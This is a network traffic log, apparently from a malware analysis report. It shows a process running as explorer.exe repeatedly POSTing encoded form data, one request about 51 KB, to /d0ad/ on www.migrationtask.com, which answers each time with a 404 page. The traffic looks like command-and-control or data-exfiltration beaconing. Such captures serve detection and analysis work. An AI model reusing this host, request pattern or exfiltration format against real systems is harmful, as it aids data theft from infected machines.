Oct 26, 2022 13:17:49.276556969 CEST	1075	OUT	POST /d0ad/ HTTP/1.1 Host: www.migrationtask.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.migrationtask.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.migrationtask.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 6b 51 41 6c 66 6f 6c 6f 6f 41 33 59 38 47 51 62 4c 46 39 61 34 41 66 42 78 53 4d 77 77 34 7a 4f 5a 77 32 79 72 38 59 57 38 32 41 68 36 34 45 49 45 76 6f 53 66 74 35 44 30 31 33 73 73 45 50 76 46 79 59 69 79 4d 43 78 71 4c 56 66 73 69 6f 48 6a 48 66 66 6e 51 51 67 41 45 30 58 62 48 41 72 50 51 57 71 36 75 72 30 4c 71 55 61 63 63 74 34 79 38 39 65 74 4b 36 4e 56 41 63 58 6f 31 4e 2d 47 78 69 33 78 7a 7e 6e 32 4f 4e 66 58 49 36 65 54 66 35 38 74 4e 68 7a 73 59 39 6d 58 7a 4a 66 4b 49 57 67 45 74 6f 65 38 65 65 4c 59 78 45 78 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=kQAlfolooA3Y8GQbLF9a4AfBxSMww4zOZw2yr8YW82Ah64EIEvoSft5D013ssEPvFyYiyMCxqLVfsioHjHffnQQgAE0XbHArPQWq6ur0LqUacct4y89etK6NVAcXo1N-Gxi3xz~n2ONfXI6eTf58tNhzsY9mXzJfKIWgEtoe8eeLYxExCA).
Oct 26, 2022 13:17:49.405298948 CEST	1076	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 26 Oct 2022 11:17:49 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.11.20	49887	74.208.236.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:51.426004887 CEST	1077	OUT	POST /d0ad/ HTTP/1.1 Host: www.migrationtask.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.migrationtask.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.migrationtask.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 6b 51 41 6c 66 6f 6c 6f 6f 41 33 59 28 6c 59 62 4e 6d 56 61 76 77 66 41 30 53 4d 77 37 59 7a 4b 5a 77 4b 79 72 35 67 47 39 44 51 68 30 36 63 49 46 71 63 53 59 74 35 44 37 56 33 77 68 6b 4f 6a 46 79 55 51 79 4e 7e 78 71 4c 42 66 73 51 51 48 68 33 66 63 28 41 51 6a 57 30 30 53 66 48 41 68 50 58 66 46 36 71 4c 30 4c 65 63 61 64 61 52 34 6b 39 39 5a 71 71 36 48 54 41 63 51 69 56 4d 6b 47 78 65 46 78 79 47 64 32 34 39 66 57 70 61 65 53 66 35 5f 69 4e 68 30 6c 34 38 34 63 32 30 4f 51 61 79 75 52 66 63 53 28 61 36 5a 56 52 42 47 55 6a 7e 4e 4e 33 52 34 55 43 33 4c 78 36 56 46 4d 58 61 72 54 31 28 5a 71 6b 79 4e 42 5a 36 52 71 56 28 38 34 68 77 63 4d 6e 34 79 6c 76 49 62 78 4e 74 43 75 75 4d 59 59 79 6d 67 72 54 77 4a 7a 6b 63 32 72 48 54 43 41 49 4a 6f 63 67 37 33 4b 66 36 38 4a 69 4f 48 4c 52 6d 4d 47 39 4b 4b 31 30 57 74 5a 62 32 54 6c 2d 6a 47 70 73 55 41 72 54 54 56 51 38 42 68 33 6b 30 68 48 4d 7a 44 28 6f 35 63 54 6e 6d 7a 4a 4b 64 6a 4b 35 57 51 45 50 75 55 34 59 6b 6a 6c 69 6e 65 58 44 38 78 4c 50 32 4e 54 6b 46 32 48 77 4a 4d 53 72 67 78 58 4f 6f 4a 61 47 72 47 68 7a 4e 69 50 68 4e 66 36 6a 61 6f 75 5a 7e 62 32 30 4d 6d 68 6e 76 68 4e 62 4a 6b 47 57 4c 30 79 33 28 33 6a 52 49 62 4a 36 37 4a 52 4f 4a 71 59 59 65 77 4e 33 48 49 58 65 75 6f 68 34 7a 67 6f 43 71 6e 73 53 73 6b 62 61 6e 66 46 42 63 46 36 4d 70 62 75 58 38 39 55 5a 58 2d 51 34 73 6f 4e 6b 5a 4d 7e 5f 78 5a 74 45 32 52 43 4a 4f 6e 32 48 62 42 57 32 74 52 5a 73 43 45 39 63 74 71 42 43 62 42 62 53 52 33 66 5f 65 59 52 6f 6c 47 6f 6a 6b 30 58 6e 56 50 43 36 43 43 28 55 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=kQAlfolooA3Y(lYbNmVavwfA0SMw7YzKZwKyr5gG9DQh06cIFqcSYt5D7V3whkOjFyUQyN~xqLBfsQQHh3fc(AQjW00SfHAhPXfF6qL0LecadaR4k99Zqq6HTAcQiVMkGxeFxyGd249fWpaeSf5_iNh0l484c20OQayuRfcS(a6ZVRBGUj~NN3R4UC3Lx6VFMXarT1(ZqkyNBZ6RqV(84hwcMn4ylvIbxNtCuuMYYymgrTwJzkc2rHTCAIJocg73Kf68JiOHLRmMG9KK10WtZb2Tl-jGpsUArTTVQ8Bh3k0hHMzD(o5cTnmzJKdjK5WQEPuU4YkjlineXD8xLP2NTkF2HwJMSrgxXOoJaGrGhzNiPhNf6jaouZ~b20MmhnvhNbJkGWL0y3(3jRIbJ67JROJqYYewN3HIXeuoh4zgoCqnsSskbanfFBcF6MpbuX89UZX-Q4soNkZM~_xZtE2RCJOn2HbBW2tRZsCE9ctqBCbBbSR3f_eYRolGojk0XnVPC6CC(Uo.
Oct 26, 2022 13:17:51.549825907 CEST	1078	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 26 Oct 2022 11:17:51 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.11.20	49888	74.208.236.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:53.570583105 CEST	1085	OUT	POST /d0ad/ HTTP/1.1 Host: www.migrationtask.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.migrationtask.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.migrationtask.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 6b 51 41 6c 66 6f 6c 6f 6f 41 33 59 28 6c 59 62 4e 6d 56 61 76 77 66 41 30 53 4d 77 37 59 7a 4b 5a 77 4b 79 72 35 67 47 39 44 59 68 30 4a 55 49 45 4a 45 53 5a 74 35 44 6c 6c 33 67 68 6b 50 35 46 78 6b 55 79 4e 79 68 71 49 35 66 74 44 59 48 68 46 48 63 70 77 51 69 49 6b 30 51 62 48 41 31 50 51 57 45 36 71 33 6b 4c 75 41 61 63 64 64 34 7a 65 56 65 67 61 36 4e 54 41 63 45 6d 56 4e 4f 47 78 71 56 78 79 36 64 32 39 39 66 59 36 69 65 51 4f 35 5f 6b 64 68 33 38 6f 39 34 48 6d 30 37 51 61 6e 5a 52 66 63 73 28 66 43 5a 56 54 5a 47 61 41 58 62 4e 58 52 34 4c 79 33 45 67 71 4a 42 4d 55 75 4e 54 31 4c 5a 71 6c 57 4e 43 35 36 52 34 42 72 39 34 42 77 57 49 6e 34 70 76 50 4d 70 78 4e 6f 78 75 76 45 59 59 69 79 67 71 6b 45 4a 78 46 63 32 31 33 54 4d 4e 6f 4a 42 46 77 37 72 4b 66 71 57 4a 68 57 39 4c 52 43 4d 48 5a 57 4b 6e 46 57 79 66 37 32 76 6f 75 69 45 74 73 59 45 72 58 28 4a 51 38 42 78 33 6d 59 68 41 38 6a 44 7e 71 52 54 51 33 6d 30 63 61 64 4d 41 5a 61 65 45 4c 4f 63 34 5a 63 7a 6c 68 4c 65 46 7a 38 78 41 49 43 4d 62 55 46 78 59 67 4a 34 4d 62 68 70 58 4f 31 31 61 45 47 39 69 43 68 69 4a 56 70 66 7e 7a 61 72 6b 5a 7e 58 28 55 4d 67 33 58 76 68 4e 62 56 4f 47 57 48 30 79 6e 33 33 6c 6d 73 62 59 35 54 4a 64 75 4a 77 59 59 66 6f 4e 33 44 37 58 65 6d 4b 68 34 44 5a 6f 41 47 6e 73 42 6b 6b 59 65 4c 63 44 78 63 41 7e 4d 6f 64 77 6e 77 71 55 64 33 6d 51 34 38 34 4e 54 70 4d 28 5f 68 5a 70 45 32 51 45 70 4f 38 67 58 62 58 64 57 70 64 5a 73 65 55 39 63 77 78 42 42 72 42 59 6b 38 70 4b 75 7e 51 4d 2d 42 78 32 6e 38 73 63 55 52 65 58 71 6d 4f 71 54 47 39 46 58 51 77 49 45 70 48 28 6a 48 34 69 45 28 4a 77 51 68 4b 6b 79 72 64 53 30 67 63 7e 38 32 68 6c 72 48 74 38 75 58 46 67 67 58 49 78 36 74 36 28 67 63 52 56 57 32 59 6e 51 37 65 6b 44 77 79 35 46 6f 71 71 63 36 67 71 6f 47 4d 73 5a 7a 48 65 6a 32 30 74 35 53 6f 55 4f 77 35 58 75 77 47 65 4e 71 43 4e 6b 52 4b 4d 52 72 54 37 6f 77 6b 65 42 77 6c 73 68 61 67 30 33 28 4e 6d 44 38 48 75 71 76 61 62 30 49 32 73 53 56 30 71 6d 63 7a 77 57 28 7a 70 53 37 4e 59 45 4f 58 63 78 42 52 49 61 73 4f 36 31 39 34 41 6f 4f 67 4b 7a 50 68 72 64 65 45 39 6c 58 41 47 72 62 65 69 4e 57 79 79 75 55 6b 43 55 70 67 54 5a 4b 6c 77 6f 78 70 49 47 36 45 35 36 64 38 68 73 35 4b 36 6a 47 38 31 65 45 59 28 56 37 48 6f 72 53 56 54 43 54 79 4c 31 4d 50 58 61 52 6e 4c 6f 41 71 49 51 44 6b 39 51 5a 6b 33 36 30 54 37 6d 35 35 6d 44 76 59 64 66 31 50 63 64 76 69 46 34 5a 39 72 45 34 56 50 33 34 59 35 4e 5a 5a 38 45 47 6a 6e 59 62 66 56 44 73 38 45 6b 4b 6b 44 52 57 76 67 59 65 38 36 7a 79 51 53 59 45 4d 59 68 64 41 36 79 74 79 4b 5a 59 37 66 6e 4c 30 7a 6e 61 78 57 31 4a 30 52 56 4b 4a 7a 5a 30 63 58 31 34 30 7e 4b 58 71 38 64 4c 76 53 73 53 45 79 66 76 44 48 48 51 62 7e 51 6a 74 53 35 56 50 51 5f 72 6e 37 6d 37 73 69 6d 6d 75 63 65 43 79 35 72 53 34 61 45 36 50 58 67 4d 4e 37 6f 4b 57 66 5a 43 4b 45 59 42 44 64 6c 63 52 6c 5a 76 73 71 36 58 63 35 7a 4b 58 59 50 45 47 6f 43 38 38 45 4a 33 46 31 68 43 31 6a 6e 6e 65 4c 67 28 47 61 31 71 2d 61 38 50 6e 6e 4a 36 71 6e 37 37 47 74 5a 65 33 74 71 59 33 68 2d 74 75 67 2d 66 58 39 7a 42 6d 78 61 4f 74 6a 78 6d 65 6d 54 42 70 79 68 56 6c 30 34 56 37 68 57 77 38 6a 46 44 6f 71 79 67 4e 52 68 35 34 71 48 64 71 57 4b 32 78 57 78 68 77 42 58 66 49 61 37 6e 4a 72 73 75 51 4f 4b 4b 56 71 4e 76 55 67 4f 48 31 76 74 30 4b 53 52 35 54 55 50 68 44 55 63 38 51 6e 55 33 79 51 35 44 59 47 30 6d 6a 75 45 35 6d 61 4c 70 70 64 63 73 42 70 79 49 44 65 6b 4d 58 50 64 64 55 75 69 30 38 46 4d 4f 44 7a 39 42 67 69 37 57 62 31 46 62 4e 72 64 56 4b 32 33 6e 33 39 55 59 69 62 30 73 74 63 49 79 41 41 5f 57 79 51 36 54 68 77 33 42 62 53 7a 61 53 37 6e 7a 5f 6d 6c 52 30 37 64 4f 4d 61 5a 4b 2d 35 45 33 51 34 5a 78 52 55 78 42 39 42 39 59 37 75 4a 58 59 4b 72 6e 4c 76 38 28 6b 44 78 50 56 6f 78 6d 66 66 50 46 76 4f 58 49 33 4c 5f 33 7a 47 65 65 53 51 46 41 62 56 71 36 78 52 62 54 39 65 50 77 7a 70 4c 65 6d 48 43 51 39 35 6f 45 79 54 57 4f 45 74 37 36 56 4b 36 6a 48 4a 49 45 6d 42 69 50 42 76 5f 6a 52 53 35 75 65 74 65 36 4a 41 6f 7a 33 79 70 42 53 55 6a 63 6d 55 52 6e 33 55 48 51 74 59 52 47 Data Ascii: jXu=kQAlfolooA3Y(lYbNmVavwfA0SMw7YzKZwKyr5gG9DYh0JUIEJESZt5Dll3ghkP5FxkUyNyhqI5ftDYHhFHcpwQiIk0QbHA1PQWE6q3kLuAacdd4zeVega6NTAcEmVNOGxqVxy6d299fY6ieQO5_kdh38o94Hm07QanZRfcs(fCZVTZGaAXbNXR4Ly3EgqJBMUuNT1LZqlWNC56R4Br94BwWIn4pvPMpxNoxuvEYYiygqkEJxFc213TMNoJBFw7rKfqWJhW9LRCMHZWKnFWyf72vouiEtsYErX(JQ8Bx3mYhA8jD~qRTQ3m0cadMAZaeELOc4ZczlhLeFz8xAICMbUFxYgJ4MbhpXO11aEG9iChiJVpf~zarkZ~X(UMg3XvhNbVOGWH0yn33lmsbY5TJduJwYYfoN3D7XemKh4DZoAGnsBkkYeLcDxcA~ModwnwqUd3mQ484NTpM(_hZpE2QEpO8gXbXdWpdZseU9cwxBBrBYk8pKu~QM-Bx2n8scUReXqmOqTG9FXQwIEpH(jH4iE(JwQhKkyrdS0gc~82hlrHt8uXFggXIx6t6(gcRVW2YnQ7ekDwy5Foqqc6gqoGMsZzHej20t5SoUOw5XuwGeNqCNkRKMRrT7owkeBwlshag03(NmD8Huqvab0I2sSV0qmczwW(zpS7NYEOXcxBRIasO6194AoOgKzPhrdeE9lXAGrbeiNWyyuUkCUpgTZKlwoxpIG6E56d8hs5K6jG81eEY(V7HorSVTCTyL1MPXaRnLoAqIQDk9QZk360T7m55mDvYdf1PcdviF4Z9rE4VP34Y5NZZ8EGjnYbfVDs8EkKkDRWvgYe86zyQSYEMYhdA6ytyKZY7fnL0znaxW1J0RVKJzZ0cX140~KXq8dLvSsSEyfvDHHQb~QjtS5VPQ_rn7m7simmuceCy5rS4aE6PXgMN7oKWfZCKEYBDdlcRlZvsq6Xc5zKXYPEGoC88EJ3F1hC1jnneLg(Ga1q-a8PnnJ6qn77GtZe3tqY3h-tug-fX9zBmxaOtjxmemTBpyhVl04V7hWw8jFDoqygNRh54qHdqWK2xWxhwBXfIa7nJrsuQOKKVqNvUgOH1vt0KSR5TUPhDUc8QnU3yQ5DYG0mjuE5maLppdcsBpyIDekMXPddUui08FMODz9Bgi7Wb1FbNrdVK23n39UYib0stcIyAA_WyQ6Thw3BbSzaS7nz_mlR07dOMaZK-5E3Q4ZxRUxB9B9Y7uJXYKrnLv8(kDxPVoxmffPFvOXI3L_3zGeeSQFAbVq6xRbT9ePwzpLemHCQ95oEyTWOEt76VK6jHJIEmBiPBv_jRS5uete6JAoz3ypBSUjcmURn3UHQtYRGynGEBOGnDPtnEITLqgZGiiF8CxSWAicv0blS066sk5r8mOVXhooiBEUN-qHiftnau~7upEqiGToEvFW5_o_DrqNLX3fVyiOc3YxVeSV2pOn6bRITnAQRsV3b5B4skH4GzhChQ0eGYdgBKrf~8UZZ7pQrhL8Pb~1k3OphTzNOjsXsDNnjJ5L7aV03tpfvJxnU7lFESUWlpsvaSoMjqu507n2xUniDlRQ7LQ1ya3eBu7rpvLG~3ZDRzfITdsa7Xkz97WQkZJgpf1u8ViXX4yXyVcenAGW0OP7kQFdeBWvnyDepbpypLssN2A2ruYhFrGa0IUzjfSC4qN2gUfGZiDxq0L1Ep2Xgb1D5dHc2SllLiuWIKku3_GO79pm9SLAUMqOAJuJkSQmib7y~0Ste2fJJa0jYhv9QFNTq0h8JYjBlq3AviK-rY7wz26qgKc5SbQFKmA8rQTXyf3zwjTMTElf0dt09poaSPqRoqGjPLM8I96FfH2EaR08hWe2V5kd~HOjXwUTzSAVYs7QNHmCWpLSGDK7s4S6NUZfTfOVfCarsE88YaNs(TJyZmM0gRpA0OVzaMiVV9mbHSTAJs7OdQuNiQUFtVFJ0OJW3-muE76HbbFneYhvCE~l~WW5xOJz3zrj6nT2lKeQY0ZiVns7E7USJ5(QIIufj5Nmq_qofyS-O-gAH85St_GMdbaU53ikWkrcOcoX8GtCFucK60fE1vwmK2lLVdzQomlzeFoCML7I7FluKkALUa13z3Cl4G1Tgp9pQ0eiclt8FVzH4JJPOw5Bvhq8~53EXMt0iyH86T4Z6QLDuR6QaMavJ329GlPtJEf0tzrR4uSetQzw2ncA2mdfUTKBZyAuiMW_9lh0YtLY(FUGu3mqZ4DBgdygEZwoIipz90xnHu6_5T1QXKscyGA5UHSvelnLK-OU~1Vuv71Gq6CNyPhdrfOaR2iEQp2Vu5u1vrpv3Ktzbh0lvNK78YuYN_8Uj5pwMUev314yZ2KGwc4GUhzVgCfGAbMz6K(VMlc0mcYOw7yB4FyLqnCbrdaLlSWOWGPRREaFbeiPLasvDqmJfXOpJ6Y6JlR-uJvWOqgWqzZgNWfBAAVvAuuSrWTwlY2meNX_bFM0SaH0dGsgfM(SHx8F3ltNvIQtaYRrBXhYGLDvOjJ37PPkIHNbbGnGk5pl~433GZ1C0e7jcJGL33QGOg6HuRM_mEKIhy6VyXW3Nfvb1C~J4YRWoY5TaCBWgIdTGJtFpiYVTX9MKYR4~kkJXSyDpeo0gxQxtw3SFgedNBkYtMxOwsZ2EfgBfAJam6oXDjpjLpgort95JfkrkT3V6QqixABSR61EyspBhELXo8rCQ23GsW6CKm66k-0lsFVyRk2Ij6b7KrMprMnkcKQwI_lP5AryHIQkDn~_aZ0dAKIEQQSUoOd8cwt9RP7wM7UTC_nUuw5GDhSqxqc_1nATvAoXMtCPtQTsxA0h8K2bF9DyLxLn42sDystnJv3F7YA4VuEyH7sJUiypaKZ_ReJ56DXydgpDAu910AsZAVjNwUmDZTPySaccnwPFulClPrJYfHREZ8YeLFxBfJ7l6kNiOcIPKUzQk-Lbn_s5OagXbGao(XriebDB6vIkIGnUKlH0OxXY0i8I6u98TGCsW5gpKMpDJcGJVErFj1(Ucay7y8aDqMb60m49ZOyCG1M6ppP3mIXdddSyvYxVJVMcYKn51UoQJukIMYK8YRcSgzbux7T3EEdtzG(dRXbfUnmgEM2oHlI4dkIyEKh0atDgTbK0NjTLzA~7oGXtjRe6nLCLVbnpD91IQyv8LTlrK1lz(-JcPbX6DmsGToRS71PJrU3yuaoijr1DQaRePlG5mwVgIt09kqRKdGn2ZeOAHrp9hYsEZnfQKwluRY8JOi5_zQSJqHVGAUmq~zAaCJexmWDzNj8axUsBUsuIZTzxc09VGedCZd0qyVAu~r~-vOFmr92rfn4kLHu-te0L0W471fls465eLVo86avAr9KusSEBhZdaziYLmSI85G(OzCF6wxewuWw8zocIZyz30_2VR9oGwI(wYG~eg87B9tY1bLIWXxMhyutfGrh_(dcpARTMbEVY~shoYw6Fwcm8(JDCvxjfrzhccWNFIOEf2obfLMNq30O69aCxAQowhRuKiE04IVApXPzEcSdutMXvlzPg4vfBfegErfZFj0VPFrjqn_oo89PaXP(qpM7AkWykmTpmcqoHgwCYCeiXtMzpUv9q~-dKKkA1gOmzA1L1ZGY44VsJX3kUYFgLJvpK2OWCSNxJOL0nFxPVJAGSuZjS1QOMPfx9YIGKOrO38Y~uxNnuhUp2yjxOzMMWfax5FfUaSMaaxXjtuLekz7sFLpxAE_nmRp2Kj9Sy6XMbHpQxH4JKhLkpe60nFUZUFwK3RiDcKBZSnxLqSdhuAhhICWRpHx~YcsXqoQIRZMJryo7DhLI0a8wqEN2IOJBCmpBmlGeDX_3KGUXLAdEZHGqlHnzFvYHiinGYp9Oo1pzVZXxTxWwvpzffTLnFSWKGp3jvsYUSQoSOgj7MP1SZhBV9ueyQrx8R~YjwiE0wr6~ww4P0GE6jWd4jUYw1y01Ez1feTvA7nB~s3Ik-zbSBiNCIgXB6BU3dHNwGPQXORehH5tXtiv9WbfHDFTAn11HTWHvw4dWs9RLrTQ1zMiLg2m9ePTH_epGbt32piBDu~eIlO13hSRxVrvjP2ZHJaVkyAmPsEE8r
Oct 26, 2022 13:17:53.570669889 CEST	1091	OUT	Data Raw: 42 49 2d 6c 5a 68 62 51 54 4c 46 77 5f 52 55 65 45 42 61 57 55 58 30 61 35 50 43 42 39 51 42 52 66 30 63 75 49 76 4b 68 56 65 57 7a 6c 41 59 62 4f 6b 65 36 76 37 4f 73 6e 6b 68 30 4d 6f 65 72 6c 50 39 64 72 51 55 72 7a 72 72 6c 34 57 66 75 55 33 Data Ascii: BI-lZhbQTLFw_RUeEBaWUX0a5PCB9QBRf0cuIvKhVeWzlAYbOke6v7Osnkh0MoerlP9drQUrzrrl4WfuU3A~YRYIAIxqOl6NW494Hfh8EH_Y6HxC-aw92w9cSTtPKvL7YCHl7NyZUGzDNlEqPlGbHBkLY2da7cZUIyonY05e1PjE0LwUPh899UirH0vn8FrFLjw7aMtSSe9pHxakByPqC04gad0HKTpqs0kaPZkLSWW4flV9DdR
Oct 26, 2022 13:17:53.693536043 CEST	1094	OUT	Data Raw: 74 7a 57 45 58 64 47 4e 58 6f 53 41 50 35 55 66 63 45 66 47 64 31 59 45 6e 54 79 34 39 57 68 48 72 50 66 53 4f 6e 4e 39 38 4c 49 42 32 4d 61 6a 64 64 4b 5a 38 6b 38 49 4a 55 58 75 2d 66 35 38 63 7e 63 38 4b 69 48 42 4c 79 76 64 6f 71 55 50 5a 55 Data Ascii: tzWEXdGNXoSAP5UfcEfGd1YEnTy49WhHrPfSOnN98LIB2MajddKZ8k8IJUXu-f58c~c8KiHBLyvdoqUPZUc9oWOLRcuuph52YqxZdSZz3~ArvCPF1HjTjaCMOclHeZYdTmVrHFfu-eB~rizNlw-RChbkAl5RTa01fzBzTRa46gsXuz-u2O6VTXOM3IUCTIDjf8pyseTzP13P6JNaQYJe94Ey44XddtF4A71Ly88NlmAP2nN6pkg
Oct 26, 2022 13:17:53.693584919 CEST	1096	OUT	Data Raw: 39 28 50 35 5a 68 4d 75 66 7a 43 64 57 32 38 58 56 4b 4a 4c 41 4f 2d 63 33 61 6b 71 33 38 4e 6b 4d 78 69 4d 4e 7a 49 6d 64 4c 59 48 59 4d 37 64 74 7a 71 28 56 32 45 4f 76 54 6a 36 48 61 31 28 74 62 51 38 71 35 58 7e 72 44 34 76 74 55 5f 6a 7a 4b Data Ascii: 9(P5ZhMufzCdW28XVKJLAO-c3akq38NkMxiMNzImdLYHYM7dtzq(V2EOvTj6Ha1(tbQ8q5X~rD4vtU_jzKOyIQPT9ku~EdT4tQ8RH2sttZ39CyLojgx3-JAAmFM3OVYY6UdwT3zgwol38UBQAHBaDzI5SOM3PhILNXsTF4ua_BtQi3s9eYMEbo9CzD1QKSTobBgiputYjcCvNME4Hr3C66l8eIE0GclSA0GXYCAJGB7kQ9cRjp1
Oct 26, 2022 13:17:53.693682909 CEST	1098	OUT	Data Raw: 44 51 75 61 63 33 44 67 35 5a 49 36 71 5a 4c 33 73 4f 35 78 47 4c 37 71 44 36 45 51 44 6f 37 4a 47 50 56 37 69 62 42 7e 65 75 75 44 34 67 64 78 42 56 39 76 62 63 59 57 79 33 36 4f 41 72 44 51 37 33 59 6a 4d 7e 46 55 6a 34 7a 47 6d 78 64 59 46 78 Data Ascii: DQuac3Dg5ZI6qZL3sO5xGL7qD6EQDo7JGPV7ibB~euuD4gdxBV9vbcYWy36OArDQ73YjM~FUj4zGmxdYFx7(fKCkjmR6WM4nstLvt5exF~9CR9nE-(GIvK1Hjf_ro0FDvSu2VChFrLipL2Ql_zrd3IQT66AsMIDuWCJYcfksip03Bc_JW5P4oxULgT9RJxRrqOrWiAq24IO2vCAfZjkbNEN4QZsn4yyc0AVsqkdFRsbekUDRZbz
Oct 26, 2022 13:17:53.693867922 CEST	1104	OUT	Data Raw: 59 53 62 54 71 4f 4a 70 6e 59 48 6f 39 30 34 67 50 77 64 65 4d 79 4d 52 30 50 4b 58 55 77 36 43 38 56 54 61 4b 77 30 28 51 37 44 6f 4d 35 4d 7e 6d 56 41 73 62 35 45 30 46 7a 58 4a 41 4f 51 7e 56 43 75 58 78 31 58 37 67 35 39 79 7a 77 54 7a 36 62 Data Ascii: YSbTqOJpnYHo904gPwdeMyMR0PKXUw6C8VTaKw0(Q7DoM5M~mVAsb5E0FzXJAOQ~VCuXx1X7g59yzwTz6bJ1Hvdy58rpsAVdk2KBe0i2gWsjPsRpetQ6pX6RqV3LvGwmSEhTN0z6JnwIBkRIKQo1alv0t6CZW3dJOD5JQ43nSR7bYcJGKvFRlBmz0302qc4L_O1q493IvTRh_b10E4xKqSVA9Lw54~PozrrTZP4U6Fu2tIHN-Ji
